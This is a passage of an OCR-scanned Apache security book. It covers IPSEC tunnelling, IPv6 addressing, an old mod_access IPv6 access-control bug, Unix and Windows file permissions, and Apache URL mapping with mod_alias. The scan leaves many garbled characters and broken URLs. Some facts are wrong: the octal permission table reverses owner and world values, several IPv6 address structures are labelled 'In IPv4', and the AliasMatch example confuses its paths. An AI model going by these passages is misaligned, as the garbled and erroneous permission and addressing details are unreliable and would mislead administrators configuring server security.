Security Payload trailer or footer is encrypted, and therefore armored against eaves- 
dropping. This process (where you use both IPSEC Authentication and Security 
Payloads) is called tunneling. 


IPSEC, Tunneling, and Security 

IPSEC authentication and encryption together provide strong security and protect 
your data from transit, replay attacks, session hijacking, and other attacks. IPSEC 
tunneling both encrypts and signs your packets. Figure 7.2 illustrates how IPSEC 
transforms a simple packet for tunneling purposes. 


As depicted in Figure 7.2, the full IPSEC tunneling approach uses both authentica- 
tion and encryption in concert. What’s really interesting about it is how IPSEC 
constructs a new IP header for transport purposes. This enables gateways along the 
route (between the source and destination networks) to efficiently forward packets 
even though non-IPSEC-enabled gateways can’t fully decode them. 
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Normal Datagram 
Normal IP | Transport Layer | Actual 
Header Header Data 
ESP Normal IP | Transport Layer | Actual ESP 
Header Header Header Data Trailer 
Creates new ESP Normal IP | Transport Layer | Actual | ESP 
IP header Header Header Header Data | Trailer 
SS EN 
New IP ESP Normal IP | Transport Layer | Actual | ESP | ESP 
Header | Header Header Header Data | Trailer | Auth 
E _— 


Encrypted Portion 


_—— 
Creates new | ESP Normal IP | Transport Layer | Actual | ESP | ESP 
IP header Header | Header Header Data | Trailer | Auth 

_———— | | 


Digitally Signed Portion 

















FIGURE 7.2 IPSEC tunnel packet structure. 


Your packets effectively travel in a secure state until their arrival at the end point. 
This is the digital equivalent of sending a postcard bearing an encrypted message 
from New York to California. Postal workers along the route can read the address 
information (the new IP header used for transport), but cannot decipher the message 
you scribbled on the postcard (the application’s data). 


NOTE 


Note that in tunneling, both the source and destination gateway must support IPSEC. If they 
don’t, this approach will not work. 





Establishing IPv6 IPSEC-enabled network interaction is beyond the scope of this 
chapter, but if you’re interested in how IPSEC works or its history, check any of the 
following Commentaries: 

Title: IP Authentication Using Keyed MD5 (RFC 1828) 

URL: http: //ww. ietf.org/rfc/rfc1828.txt 


Abstract: Describes the use of keyed MD5 with the IP Authentication Header. 
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Title: The ESP DES-CBC Transform (RFC 1829) 
URL: http: //www.ietf.org/rfc/rfc1829.txt 


Abstract: Describes the DES-CBC security transform for the IP Encapsulating Security Payload. 


Title: HMAC: Keyed-Hashing for Message Authentication (RFC 2104) 
URL: http: //www.ietf.org/rfc/rfc2104.txt 


Abstract: Specifies HMAC using a generic cryptographic hash function. 


Title: HMAC-MD5 IP Authentication with Replay Prevention (RFC 2085) 
URL: http://www. ietf.org/rfc/rfc2085.txt 


Abstract: Describes a keyed-MDS5 transform to be used in conjunction with the IP 
Authentication Header. 


Title: Security Architecture for the Internet Protocol (RFC 2401) 
URL: http: //www.ietf.org/rfc/rfc2401.txt 


Abstract: Specifies the base architecture for IPSEC-compliant systems. 


Title: The NULL Encryption Algorithm and Its Use with IPSEC 
URL: http: //www.ietf.org/rfc/rfc2410.txt 


Abstract: Defines the NULL encryption algorithm and its use with the IPSEC Encapsulating 
Security Payload. 


Title: IP Security Document Roadmap (RFC 2411) 
URL: http: //www.ietf.org/rfc/rfc2411.txt 


Abstract: Explains what you'll find in IPSEC documentation, and what to include in new 


Encryption Algorithm and Authentication Algorithm documents. 


Title: IP Authentication Header (RFC 2402) 
URL: http: //www.ietf.org/rfc/rfc2402.txt 


Abstract: Explains IP Authentication Header format. 
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Title: The OAKLEY Key Determination Protocol (RFC 2412) 
URL: http: //www.ietf.org/rfc/rfc2412.txt 


Abstract: Describes a protocol named Oakley, by which two authenticated parties can agree 
on secure and secret keying material. The basic mechanism is the Diffie-Hellman key exchange 


algorithm. 


Title: IP Encapsulating Security Payload (ESP) (RFC 2406) 
URL: http://www. ietf.org/rfc/rfc2406.txt 


Abstract: Defines the Encapsulating Security Payload. 


Title: Internet Security Association and Key Management Protocol (ISAKMP) (RFC 2408) 
URL: http://www. ietf.org/rfc/rfc2408.txt 


Description: Describes a protocol utilizing security concepts necessary for establishing Security 


Associations (SA) and cryptographic keys in an Internet environment. 


Title: The Internet Key Exchange (IKE) (RFC 2409) 
URL: http://www. ietf.org/rfc/rfc2409.txt 


Description: Describes a protocol using part of Oakley and part of SKEME in conjunction with 
ISAKMP to obtain authenticated keying material for use with ISAKMP. 


Why Does Apache Support IPv6? 


If the only issue at hand were IPv6’s new security features, the Apache development 
team could safely ignore IPv6. However, these features constitute only one side of 
the coin. IPv6 will institute dramatic changes in how internetworks find hosts and 
route network traffic to them. Thus, Apache supports IPv6 because it must. 


Apache and IPv6 Addressing 


As noted above, IPv6 addresses are 128-bit (not IPv4-style 32-bit) values. This repre- 
sents a significant shift. Briefly, let’s look at IPv6 addressing and cover the following 
issues: 


e IPv6 basic address structure 


e Types of IPv6 addresses 
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IPv6 Basic Address Structure 


Typical IPv6 addresses consist of eight 16-bit fields populated with hexadecimal 
values, delimited by colons, as seen in Figure 7.3. 





Eight fields, colon-delimited, 
and containing hexadecimal 
values. 






FIGURE 7.3 \Pv6 address structure. 


The format in Figure 7.3 is the standard IPv6 address structure. However, IPv6 also 
supports hybrid, or mixed, address formatting. In mixed addresses, the first six fields 
are colon-delimited hexadecimal values (the six high-order 16-bit portions) and the 
last four fields are dot-delimited decimal values (the four low-order 8-bit portions): 


H:H:H:H:H:H:D.D.D.D 


For example: 


0:0:0:0:0:0:0:80.10.16.132 


Types Of IPv6 Addresses 


In the widest terms, four IPv6 address types exist for general use: 
e anycast—A one-to-nearest type (packets go to one interface) 
e multicast—A one-to-many type (packets go to all listening interfaces) 
e reserved—A reserved type reserved for future designation 


e unicast—A one-to-one type (packets go to a specific interface) 


The address’ leading portion (the prefix) defines the type. Table 7.2 lists prefix-type 
pairs. 
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TABLE 7.2 \Pv6 Address Prefix-Type Pairs 





Prefix Type (and Space) 
00000000 Reserved (1/256) 
00000001 Reserved (1/256) 
0000001 NSAP (1/128) 

0000010 IPX (1/128) 

0000011 Reserved (1/128) 
00001 Reserved (1/32) 

0001 Reserved (1/16) 

001 Reserved (1/8) 

010 Provider-Based Unicast (1/8) 
011 Reserved (1/8) 

100 Geographic-Based Unicast (1/8) 
101 Reserved (1/8) 

110 Reserved (1/8) 

1110 Reserved (1/16) 

11110 Reserved (1/32) 
111110 Reserved (1/64) 
1111110 Reserved (1/128) 
11111110 Reserved (1/512) 
1111111011 Link-Local Use (1/1024) 
11111110 Site-Local Use (1/1024) 
11111111 Multicast (1/256) 





Within that framework, seven structures exist: 


e IEEE 48-bit structure—In IPv6, IEEE 48-bit addresses express three significant 
attributes: a variable-length subscriber prefix, a variable-length subnet ID, and a 
48-bit interface ID. 


e IPv4 compatible structure—In IPv4, IPv4-compatible addresses express three 
significant attributes: an 80-bit decimal field, a 16-bit decimal field, and a 32- 
bit IPv4 address. 


e [Pv4 mapped structure—In IPv4, IPv4-mapped addresses express three signifi- 
cant attributes: an 80-bit decimal field, a 16-bit hexadecimal field, and a 32-bit 
decimal IPv4 address. 


e Link-Local structure—In IPv4, Link-Local addresses express four significant 
attributes: a variable-length binary field, a flag field, a variable-length subnet 
ID, and a 118-bit interface ID. 
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e Service Provider structure—In IPv6, IEEE Service Provider addresses express five 
significant attributes: registry ID, provider ID, subscriber ID, subnet ID, and an 
interface ID. 


e Standard, unstructured address structure—Unstructured addresses are 128-bit 
values without any particular significant designations therein. 


e Subnet structure—In IPv6, Subnet structure addresses express two significant 
attributes: subnet prefix and interface ID. 


IPv6 Address Issues in Development 


IPv6’s addressing scheme is more complicated than IPv4’s (chiefly because it supports 
mixed-type addresses). Thus, as vendors migrate to IPv6, expect problems. Even 
highly skilled developers will doubtless make errors in early implementations. 
Apache did. 


For example, in httpd-2_0_12-alpha’s release, a researcher in Japan found that on 
SunOS 5.8 (with gcc 2.95.2), Apache (in mod_access) handled differences in IPv4 and 
IPv6 address structures incorrectly and thus broke access controls. When accepting a 
client’s socket with IPv6é-mapped IPv4 addresses, Apache couldn’t match Allow/Deny 
directives during the accept() phase, rendering access control moot. This arose for 
two reasons: 


First, IPv6 IPv4-mapped type addresses had a different sockaddr_in format and failed 
to match standard Apache Allow: IPADDR/MASK rules. The standard sockaddr_in 
structure looks like this: 


struct sockaddr_in { 
short sin_family; 

short sin_port; 

struct in_addr sin_addr; 
char sin_zero[8]; 

J 


In contrast, the IPv6 sockaddr_in structure (sockaddr_in6) looks like this: 


struct sockaddr_in6 { 

short sin6_family; /* AF_INET6 */ 

u_short sin6_port; /* Transport level port number */ 
u_long sin6_flowinfo; /* IPv6 flow information */ 
struct in_addr6 sin6_addr; /* IPv6 address */ 

}; 
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Second, Apache applies access controls only after it makes double-lookups 
(accept ()addr->FQDN->addr). This won’t always return IPv6 addresses (AAAA 
record/sockaddr_in6), at least not yet. 


NOTE 


To learn more about this bug, check the Apache bug database at 
http://bugs.apache.org/index.cgi/full/7323. This patch didn’t work in all cases, but 
http://bugs.apache.org/index.cgi/full/7407 contains an updated one. 





Apache’s IPv6 support is a work in progress. As IIl relate below, the Listen, 
NameVirtualHost, and VirtualHost directives support IPv6 in Apache 1.3 and 2.0. 
However, while Apache 1.3 currently supports IPv6 literal address strings (see RFC 
2732) in URLs, Apache 2.0 does not (not as of this writing, anyway). Essentially, IPv6 
support is still a work-in-progress in most applications. 


IPv6 in Apache Source Code 


In Apache’s latest source code, the following directories, files, and functions contain 
IPv6 support code: 


e httpd-version/server/core.c—Matches IPv4-mapped IPv6 addresses with 
IPv4 A records, in do_double_reverse() 


e httpd-version/server/listen.c—Gets the socket family type and tries A_NET6 
to see whether IPv6 is supported, in find_default_family() 


e httpd-version/srclib/apr/include/apr.h—The macro APR_HAVE_IPV6 


e httpd-version/srclib/apr/include/apr/apr_network_io.h—IPv6 address 
parsing in apr_parse_addr_port() 


e httpd-version/srclib/apr/include/apr/strings/apr_snprintf .c— Code to 
handle non-IPv4-mapped addresses 


e httpd-version/srclib/apr/network_io/unix/inet_ntop.c—Converts IPv6 
binary address into presentation (printable) format, in inet_ntop6() 


e httpd-version/srclib/apr/network_io/unix/inet_pto.c—Converts from 
presentation format (ASCII-printable) to network format, in apr_inet_pton(), 
and converts presentation-level addresses to network order binary form, in 
inet_pton6() 


e sockets.c (in srclib/network_io, in directories os2, windows, and unix), to set 
up APR_INET6 
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Papers and Resources on IPv6 Development 


If you intend to develop for IPv6, the following resource list will help. Although 
slanted more toward Unix-based development, it provides links to important docu- 
ments on IPv4/IPv6 interoperability and porting to several platforms, including 
Windows and Novell. 


Title: IPv6 and the Future of the Internet 
URL: http: //www.sun.com/software/white-papers/wp-ipv6/ipv6éwp. pdf 


Description: Sun Microsystems document that describes the major differences between IPv4 


and IPv6, and how this affects socket programming. 


Title: Basic Socket Interface Extensions for IPv6 
URL: ftp: //ftp.isi.edu/in-notes/rfc2553.txt 


Description: S. Thomson, J. Bound, and W. Stevens lay out IPv6’s socket interface. 


Title: Advanced Sockets API for IPv6 
URL: ftp: //ftp.isi.edu/in-notes/rfc2292.txt 


Description: W. Stevens provides API access to IPv6 interface identification, IPv6 extension 


headers, Hop-by-Hop options, destination options, and source routing. 


Title: Source Code for UNIX Network Programming, Volume 1, Second Edition: Networking 
APIs: Sockets and XTI (Stevens) 


URL: http://www. kohala.com/start/unpv12e/unpv12e.tar.gz 


Description: Many good examples here from this book on IPv4/IPv6 porting. 


Title: A Technical Introduction to IPv6 
URL: http: //www.ietf.org/internet-drafts/draft-lutchann-ipv6-intro-00.txt 


Description: Cornell University’s Nathan Lutchansky introduces us to IPv6 and discusses 


addressing and routing along the way. 


Title: A Technical Introduction to IPv6 
URL: http://www. ietf.org/internet-drafts/draft-lutchann-ipv6-intro-00.txt 


Description: Cornell University’s Nathan Lutchansky introduces us to IPv6 and discusses 


addressing and routing along the way. 
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Title: IPv6-Enabled Server Code from Platform SDK (Windows Sockets) 


URL: http: //msdn.microsoft.com/library/default.asp?url=/library/en- 


us/winsock/portguid_3142.asp 


Description: Microsoft engineers show us how to write a Windows server in IPv6. 


Title: Transient Addressing for Related Processes: Improved Firewalling by Using IPv6 and 


Multiple Addresses per Host 
URL: http: //www.research.att.com/~smb/papers/tarp/tarp.html 


Description: Peter M. Gleitz and Steven M. Bellovin propose a new method of assigning 
network addresses to an interface for extended periods (a method that accounts for IPv6), 
called Transient Addressing for Related Processes (TARP), whereby hosts temporarily employ 


and subsequently discard IPv6 addresses in servicing a client host’s network requests. 


Title: Socket Programming Overview 
URL: http: //www.cse.unsw.edu.au/~cs4111/00s2/SocketProgram. html 


Description: The University of New South Wales’ lan Gorton provides an excellent overview of 


socket issues and how to handle |IPv4/IPv6 interoperability. 


Title: Internet Programming Using Sockets 
URL: http: //uluru.poly.edu/~tmoors/courses/sockets/notes.pdf 


Description: Tim Moors, from the Center for Advanced Technology in Telecommunications at 
Polytechnic University, discusses (in a presentation) sockets and IPv4/IPv6 issues. The presenta- 


tion contains slides that diagram out socket concepts. 


Title: An Interface for Transparent Network Programming 
URL: http: //developer.novell.com.au/support/winsock/doc/wsanx-1.htm 


Description: Novell describes networking programming (on Novell and Windows) and 


IPv4/IPv6 interoperability. 


Title: Internet Protocol Version 6 and the Digital UNIX Implementation Experience 
URL: http: //research.compaq.com/wr1/DECarchives/DTJ/DTJNQ1/DTJNO1HM.HTM 


Description: Daniel T. Harrington, James P. Bound, John J. McCann, and Matt Thomas discuss 
IPv6 on Digital Unix. This is a detailed, enlightening, and well-considered document that 


describes addressing, packet structure, and routing. 
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Listen, NameVirtualHost, and VirtualHost 


Three directives we’ll study at length in other chapters currently support IPv6: 


e Listen—Listen tells Apache to accept incoming requests on the port or 
address-and-port combination you specify—and you could express this in IPv6- 
style addressing. 


e NameVirtualHost—NameVirtualHost lets you specify the IP address Apache will 
use to receive virtual host requests, and you can specify this host/port combi- 
nation with IPv6-style addressing. 


e VirtualHost—VirtualHost lets you specify by-virtual-host rules for your 
virtual hosts, and Apache accepts IPv6-style address/port pairs. 


IPv6 Implementations 


If you want to experiment with IPv6, many free implementations—and more than a 
few commercial ones—exist. Table 7.3 lists these. 


TABLE 7.3 \|Pv6 Implementations 


AIX 4.3+ 
Apple IPv6 


BSDI 


Cisco 

Compaq 

Ericsson Telebit A/S 
Extreme Networks 


FreeBSD 


IBM's AIX 4.3 now has integrated IPv6 support. Learn more at http: //www- 
1.ibm.com/servers/aix/library/aixsecwp.html. 

Apple supports IPv6 and provides an SDK for developers porting over. Get it 
at http: //developer.apple.com/seeding/. 

BSDI integrated IPv6 support into its operating system early on, launching it 
in 1998 in Internet Server. Learn more at http: //www.windriver.com/prod- 
ucts/html/bsd_os.html. 

Cisco provides many different levels of IPv6é-enabled hardware. Check here 
for information: http: //www.cisco.com/warp/public/732/Tech/ipv6/. 
Compaq has IPv6 support for Alpha Tru64 UNIX and Alpha OpenVMS. Learn 
more at http: //www.compaq.com/ipv6/Tru64UNIX.html. 

Ericsson Telebit A/S offers IPv6-enabled routers. Check here for more informa- 
tion: http: //www.ericssontelebit.com/. 

Extreme Networks offers IPv6-enabled layer 3 switches. Check here: 
http://www. extremenetworks.com/. 

FreeBSD has had IPv6 for while, spinning off the KAME project. To learn 
more, to http: //ww. freebsd. org/doc/en_US.1S08859- 1/books/develop- 
ers-handbook/ipv6.html or http: //www.kame.net. 
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HPIV6 


InterPeak 


IP Infusion 


Mentat 


Microsoft 


Nokia 


OS/390 


Sun 


Toolnet6 


Trumpet 


HP-UX 11i’s implementation of IPv6 offers a greatly expanded number of 
Internet addresses, more complete security and authentication, and greater 
ease of manageability and configuration. The release will run on HP-UX 
servers and workstations supported on 11i. You can install it in either a 32-bit 
or 64-bit environment, it requires 90 megabytes disk space, and the approxi- 
mate file size for download is 25 megabytes. Get it at http://www. soft - 
ware. hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo. 
pl?productNumber=T13Q6AA. 

InterPeak offers a portable, full-featured, KAME IPv6/BSD 4.4-compliant dual 
IPv4/IPv6 stack for embedded systems running real-time operating systems 
(RTOS). Learn more at http://www. interpeak.com/. 

IP Infusion offers advanced IPv4, IPv6, MPLS-VPN, and traffic engineering 
routing software for Core, Edge, and Access equipment. Learn more at 
http: //www.ipinfusion.com/. 

Mentat TCPTM is a STREAMS-based implementation of TCP/IP, 64-bit 
compatible, and includes IPv6, IP Security, IP multicast, and large windows. 
The suite runs on HP-UX 11, Mac OS, Linux, Microsoft Windows NT, Wind 
River VxWorks, and SCO UnixWare. Learn more at 

http: //www.mentat.com/tcp/tcp.html. 

Microsoft Research (MSR) offers an IPv6 implementation. Check out the 
research page at 

http: //www.research.microsoft.com/msripv6/msripv6.htm. 

Nokia is working on integrated IPv6 support in its wireless product line. Learn 
more about those efforts here: http: //www.nokia.com/ipv6/index.html. 
IPv6 for OS/390 provides an implementation of IPv4 and IPv6 for OS/390. It 
is a Physical File System for OS/390 UNIX System Services that supports 
AF_INET, AF_INET6, and AF_ROUTE socket address families. Learn more at 
http: //www-3.ibm.com/software/network/commserver/library/publica- 
tions/ipv6.html. 

Sun Microsystems, with Solaris 8, offers integrated IPv6 support. Learn more 
at http: //www.sun.com/solaris/ipv6/. 

Hitachi’s Toolnet6 provides IPv6é connectivity for Windows PCs. Applications 
working on Windows 95, 98, or NT can access both IPv4 and IPv6 networks 
using Toolnet6. Get it here for free: 

http: //ww.hitachi.co.jp/Prod/comp/network/pexv6-e.htm. 

Trumpet integrated IPv6 into the Trumpet Winsock, Fanfare, and PETROS 
product lines. Learn more at http: //www.trumpet.com.au/ipv6.htm. 
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Summary 
For now, IPv6 support is overkill and represents forward thinking. In the future, 
though, IPv6 support will be essential, especially for applications that handle packets 
routed through proxies or other gateways (applications like Apache). 


Now that we’ve covered both third-party and Apache native security issues and 
features, it’s time to examine general administration of Apache Web Server. That’s 
what the next chapter is all about. 
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Overlording Apache 
Server: General 
Administration 


This chapter looks at general Apache administration and 
the tools that you’ll use most often to configure, run, and 
maintain your system. 


Permissions and Apache Server 


Your operating system’s permissions have a strong bearing 
on Apache’s security. Here’s why: Files that Apache oper- 
ates on carry operating system-level permissions. Attackers 
can penetrate system security, execute commands, or gain 
unauthorized access to files and directories and generally 
wreak havoc if such permissions are lax. 


For example: 


e Independent researchers recently found that NAI PGP 
Keyserver 7.0 and 7.0.1 files had erroneous permis- 
sions. Thus, attackers, going through Apache and 
using a custom URL, could turn the service on 
and off. 


e Conectiva Linux 5.1, 5.6, and 6.0 unpacked 
/var/log/mysql world-readable. This was an issue 
because /var/log/mysql contains significant intelli- 
gence information (such as usernames, passwords, 
and even account creation). 


e DOOW versions prior to v0.2.2 (DOOW is a tool for 
building knowledge bases with MySQL) didn’t aggres- 
sively check user permissions. Thus, attackers could 
gain elevated access. 


IN THIS CHAPTER 
e Permissions and Apache 
Server 
e URL Mapping and Security 
e Resource Usage 


e Apache Server Tools 
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e MySQL 3.20.32a and 3.23.34 both harbored a hole whereby local users could 
attack MySQL and ultimately the underlying system. Local users could, if they 
had CREATE TABLE permissions, link to a root-writable file in /var/tmp to 
overwrite data in a specified table of the same name. 


e WinMySQLadmin, a tool that enables Windows users to comfortably manage 
remote MySQL databases, stored passwords in my.ini in clear text. This file was 
world-readable, thus exposing passwords to any local user. 


However, it needn’t be Apache or even third-party software that has bad permissions 
that weaken system security. This issue can just as easily arise in your homegrown 
software. Thus, even though it’s tedious, I elected to quickly revisit permission 
concepts here. 


We'll focus on two operating systems: 
e Permissions and ownership in Unix 


e Permissions and ownership in Windows 


Permissions and Ownership in Unix 


In Unix, three basic permission types exist: 
e Read: These enable users to read the specified file. 
e Write: These enable users to alter the specified file. 


e Execute: These enable users to execute the specified file. 


When you assign these permissions, Unix retains a record and later reflects it in file 
listings. It expresses each file’s permission status in tokens. The three basic tokens 
that correspond to read, write, and execute are 


e r—READ access 
e w—WRITE access 


e x—EXECUTE access 


A typical directory listing: 


drwxrwxr-x 3 Nicole Nicole 1024 Jan 18 13:10. 

drwxr-xr-x 15 root root 1024 Jan 14 23:22 .. 

-rw-rw-r-- 1 Nicole Nicole 173 Jan 18 12:36 .bash_history 
-rw-r--r-- 1 Nicole Nicole 674 Jan 5 13:10 .bashre 
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-rw-r--r-- 1 Nicole Nicole 602 Jan 5 13:10 .cshre 
-PW-P--P-- 1 Nicole Nicole 116 Jan 5 13:10 .login 
-PW-P--P-- 1 Nicole Nicole 234 Jan 5 13:10 .profile 
drwxr-xr-x 3 Nicole Nicole 1024 Jan 7 22:07 lg 
-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


We’ll use Nicole’s Perl script as our example: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Look at the far-left column to see the permissions: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


The first character specifies the resource type. In this field: 
e - represents a file 
e b represents a block-special file 
e c represents a character-special file 
e d represents a directory 


e 1 represents a symbolic link 


The nine remaining characters are split into three groups of three: 
e The owner’s permissions—These permissions show the file owner’s access. 
e Group permissions—These permissions show the file group’s access. 


e World permissions—These permissions show what rights, if any, the rest of the 
world has to access this file. 


Let’s apply those rules to Nicole’s Perl script. We can see, for example, that this 


resource is a file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Nicole (the file’s owner) has full access rights. She can read, write, and execute this 
file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Likewise, group users (in group Nicole) can also read, write, and execute the file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 
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And finally, others (not Nicole and those who do not belong to her group) can only 
read and execute the file. They cannot write it: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


So: 


e The first character tells you the type of file you’re dealing with, typically a 
regular file (-) or a directory (d). 


e The next three characters tell you the owner’s privileges. 
e The second set of three tells you the group’s privileges. 


e The last set of three tells you the world’s privileges. 


chmod: Changing File Permissions in Unix 
To change permissions on a Unix file or directory, use chmod. chmod accepts three 
operators, which all perform a different function: -, +, and =. 


e The - symbol removes permissions. 
e The + symbol adds permissions. 


e The = symbol assigns permissions. 


Table 8.1 summarizes what permissions these operators can remove, add, or assign. 


TABLE 8.1 chmod Permissions 


chmod Permission Explanation 





r The r character adds or subtracts READ permission. Example: chmod +r 
filename adds the READ permission to filename. 

w The w character adds or subtracts WRITE permission. Example: chmod -w 
filename takes away write permission from filename. 

x The x character adds or subtracts EXECUTE permission. Example: chmod +x 
filename adds the EXECUTE permission to filename. 





Using letters (r, w, x) to assign permissions on individual files and directories is one 
method. Another is the octal system, where you add octals together to produce a 
final permission set. 


The Octal System 
In the octal system, numbers represent permissions. Table 8.2 summarizes the octal 
scheme and what each number represents. 
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TABLE 8.2 Octal Values 





Octal Value Explanation 
0000 Equivalent to --- or no permissions at all. 
0001 Equivalent to --x, or EXECUTE permission for the file’s owner. 
0002 Equivalent to -w-, or only WRITE permission for the file’s owner. 
0004 Equivalent to r--, or only READ permission for the file’s owner. 
0010 Equivalent to EXECUTE permission for the group, (where the second set of three 
is --x). 
0020 Equivalent to WRITE permission for the group, (where the second set of three 
is -w-). 
0040 Equivalent to READ permission for the group, (where the second set of three 
is r--). 
0100 Equivalent to EXECUTE permission for the world (where the third set of three 
is --x). 
0200 Equivalent to WRITE permission for the world, (where the third set of three is -w-). 
0400 Equivalent to READ permission for the world, (where the third set of three is r- -). 





When using hard octal values, you add them together, thus deriving a final number 
that expresses all permissions granted. But you needn’t complicate it that much. You 
can reduce permissions for owner, group, and others to a three-digit number, using 
these values: 


e 0 = no permissions 

e 1 = execute 

e 2 = write 

e 3 = write and execute (not used much these days) 
e 4 = read 

e 5 = read and execute 

e 6 = read and write 


e 7 =the whole shebang: read, write, and execute 


For example, perhaps you’ve developed a script. To make your script available to all 
users, you could do something like this: 


chmod 751 myscript.cgi 
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In this case, myscript.cgi carries the following permissions: 
e The owner can read, write, and execute it (7) 
e The group can read and execute it (5) 


e The world (outsiders) can only execute it (1) 


NOTE 

Note that if you need to change permissions to many files nested in multiple subdirectories of 
a directory tree, use chmod’s -R flag. This forces a recursive alteration of permissions on all files 
matching your criteria, in all subdirectories subordinate to where chmod starts its work. 





Permissions and Ownership in Windows 

Window releases (NT, 2000, and XP) embed permission controls into the system 
core. When you develop a Windows application, you'll include WINNT.H. There, 
you'll find the hard technical information on Windows access control. 


When Windows creates an object, it assigns to it a Security Descriptor, or SID. 
WINNT .H defines the Security Descriptor and its data types. 


The Security Descriptor’s data structure is 


typedef struct SECURITY DESCRIPTOR { 

BYTE Revision; 

BYTE Sbz1; 
SECURITY_DESCRIPTOR_CONTROL Control; 
PSID Owner; 

PSID Group; 

PACL Sacl; 

PACL Dacl; 


} 


These fields store 


e Revision—The security descriptor’s revision level, which provides a tracking or 
history mechanism. 


e Control—tThe security descriptor’s flags, which we’ll discuss later. Such flags 
denote the circumstances under which the SID or ACL was derived. 


e Owner—Either a pointer or offset to the owner’s SID or a null value. 


e Group—Either a pointer or offset to the primary group’s SID or a null value. 
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e SACL—A pointer to a system ACL (System Access Control List). 


e DACL—A pointer to a DACL (Discretionary Access Control List). 


Here’s a list of control field flags and their significance: 


e SE_OWNER_DEFAULTED—A default mechanism (not the original owner provider) 
provided this owner SID. 


e SE_GROUP_DEFAULTED—A default mechanism (not the original group provider) 
provided this group SID. 


e SE_DACL_PRESENT—The security descriptor contains a DACL. 


e SE_DACL_DEFAULTED—A default mechanism (not the original owner provider) 
provided this DACL. 


e SE_SACL_PRESENT—The security descriptor contains a SACL. 


e SE _SACL_DEFAULTED—A default mechanism (not the original owner provider) 
provided this SACL. 


e SE_SELF_RELATIVE—The security descriptor is in self-relative form. 


Through this structure, Windows maintains surveillance on objects. For each such 
object, Windows maintains an access control list (ACL). Here is the basic ACL feature 
set, which defines what users can do: 


e Full Control—the specified user can read, write, execute, or modify the speci- 
fied object 


e Modify—the specified user can modify the specified object 
e Read—tThe specified user can read the specified object 


e Read and Execute—The specified user can read and execute the specified 
object 


e Write—The specified user can write the specified object 


xcacls: Changing File Permissions in Windows 
xcacls enables you to change permissions (recursively if necessary). 


The syntax is 


C:> xcacls filename options 


Table 8.3 summarizes xcacls options, arguments, and access masks. 
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TABLE 8.3 xcacls Options, Arguments, and Access Masks 


Option, Argument Mask 


Meaning 





/C 
/D 
/E 


/G[user:permission; spec] 
/P[user:permission; spec] 
/R 

/T 

IY 

[filename] 


c 


D 
E 
F 
0 


x =D V 


Ignores access errors and continues. 

Denies the user access. 

Edits the target ACL instead of replacing it. Use this when ACEs 
exist that you don’t want to nuke. 

Grants the specified user the specified permission to filename. 
Replaces the user’s permissions as specified. 

Revokes the user’s access as specified. 

Performs a recursive search and change operation. Use this to 
apply your ACL/ACE changes in the current directory and all subdi- 
rectories within it. 

Disables the messages that W2K normally displays while perform- 
ing xcacls jobs. 

Denotes the filename whose ACLs or ACEs you want to alter. 

An access mask that denotes change access. 

An access mask that denotes the capability to delete file attributes. 
An access mask that denotes the capability to read file attributes. 
An access mask that denotes full control. 

An access mask that denotes the capability to take ownership of 
the specified object. 

An access mask that denotes the capability to change permissions. 
An access mask that denotes read access. 

An access mask that denotes the capability to write file attributes. 
An access mask that denotes that capability to execute the speci- 
fied file. 





An example: 


xcacls c:\winnt\system32\*.* /G users:RX /T /E 


Here, you restrict users to read and execute permissions only for c: \winnt\system32 
and all its subdirectories and files therein. 


Summary on Permissions 
Always apply sufficiently stringent permissions on files that Apache will process. 


Never allow a file to exist within your DocumentRoot structure that is either world- 
executable or world-writable. And, if you support user directories, frequently check 
permissions there, because users are less likely than you to know about permission 
safety. 
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URL Mapping and Security 


URL mapping, the capability to map one file or directory to another, is a key Apache 
feature. Initially, mapping seems straightforward. However, even such a seemingly 
simple operation can sometimes raise security issues. 


Apache performs mapping using five modules: 
e mod_alias 
e mod_rewrite 
e mod_speling 
e mod_userdir 


e mod_vhost_alias 


mod_alias 


mod_alias provides file, directory, and URL mapping and redirection. Note that in 
regards to redirection (and more complicated operations), you should rely more on 
mod_rewrite, which we’ll discuss later. However, mod_alias is a key mapping utility. 


You'll find mod_alias’s source in httpd-version/modules/mappers, in mod_alias.c. 
mod_alias directives enable you to manipulate URLs and map between URLs and file 
system paths, or designate a directory (the only directory) that can contain CGI. 


Apache constants that such directives can return include the following: 


e HTTP_GONE—Denotes HTTP Gone status. The requested resource is unavailable 
and left no forwarding address. 


e HTTP_MOVED_PERMANENTLY—Denotes HTTP Moved Permanently status. The 
requested resource has been assigned a new permanent URI. 


e HTTP_MOVED_TEMPORARILY—Denotes HTTP Moved Temporarily status. The 
requested resource resides temporarily at a different URI. 


e HTTP_SEE_OTHER—Denotes HTTP See Other status. (Use a GET to retrieve the 
document elsewhere, wherever it moved to.) 


mod_alias directives are 
e Alias 
e AliasMatch 


e Redirect 


144 CHAPTER 8 Overlording Apache Server: General Administration 


e RedirectMatch 
e ScriptAlias 


e ScriptAliasMatch 


Alias 

Alias lets you store documents in the at-large file system instead of beneath 
DocumentRoot. URLs with a (%-decoded) path beginning with URL-path, map to local 
files, starting with a leading directory- filename. 


The syntax is 

Alias URL-path file-path | directory-path 

Here, URL -path is the internal path (relative to DocumentRoot), and file-path and 
directory -path represent where you’d like to map such requests to on the system. 


For example, suppose you wanted http: //www.yourhost.com/images to map inter- 
nally to /usr/shared/images. You could articulate it this way: 


Alias /images /usr/shared/images 


AliasMatch 
AliasMatch is essentially Alias with regular expression power. Apache applies regex 
matching to URL-path and directory-path. 


The syntax is 


AliasMatch regex file-path | directory-path 


Here, regex is the pattern, and file-path and directory-path denote locations. For 
example, suppose you wanted to alias all files in /icons (relative to DocumentRoot) to 
/usr/shared/icons. You could articulate it like this: 


AliasMatch */icons(.*) /usr/shared/icons$1 


After httpd restarts, requests to http://www. yourhost.com/images would be mapped 
to /usr/shared/icons/*. 


NOTE 


Here are some caveats for directives that support regular expressions. First, you must observe 
case-sensitivity rules per your operating system. If you don’t, expect trouble. HFS+, for 
